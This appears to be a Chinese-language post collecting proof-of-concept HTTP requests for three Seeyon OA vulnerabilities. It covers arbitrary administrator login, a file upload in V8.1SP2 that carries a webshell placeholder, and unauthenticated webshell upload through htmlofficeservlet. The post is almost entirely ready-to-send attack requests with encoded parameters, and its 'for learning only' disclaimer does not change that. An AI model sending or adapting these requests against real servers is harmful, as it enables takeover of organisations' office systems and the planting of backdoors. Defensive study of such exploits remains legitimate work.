致远漏洞 PoC 整理

吉沃运营专员

本文内容为互联网上收集，禁止用于非法用途，仅供学习使用！

致远 OA 任意管理员登录

1. POST /seeyon/thirdpartyController.do HTTP/1.1
   
2. 
   
3. method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1

复制代码

致远 OA_V8.1SP2 文件上传漏洞

1. POST /seeyou/ajax.do?method=ajaxAction&managerName=formulaManager&managerMethod=saveFormula4C1oud HTTP/1.1
   
2. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
   
3. User-Agent: Cozilla/5.0 (Vindows Et 6.1; Sow64,rident/7.0; ry:11.0)
   
4. Accept-Encoding: gzip,deflate
   
5. Cookie:JSESSIONID=5bGx5rW35LmL5YWz
   
6. Cache-Control: no-cache
   
7. Content-Encoding: deflate
   
8. Pragma: no-cache
   
9. Host: 1.1.1.1
   
10. Accept: text/html，image/gif, image/jpeg，*; q=.2,*/*; q=.2
    
11. Content-Length:522729
    
12. Connection: close
    
13. X-Forwarded-For: 1.2.3.4
    
14. 
    
15. arguments={"formulaName":"test","formulaAlias":"safe_pre","formulaType":"2","formulaExpression":"","sample":"马子"}

复制代码

致远 OA 协同管理软件无需登录 GetShell

ip/seeyon/htmlofficeservlet

1. DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV
   
2. OPTION=S3WYOSWLBSGr
   
3. currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
   
4. CREATEDATE=wUghPB3szB3Xwg66
   
5. RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
   
6. originalFileId=wV66
   
7. originalCreateDate=wUghPB3szB3Xwg66
   
8. FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2
   
9. dEg6
   
10. needReadFile=yRWZdAS6
    
11. originalCreateDate=wLSGP4oEzLKAz4=iz=66
    
12. webshell

复制代码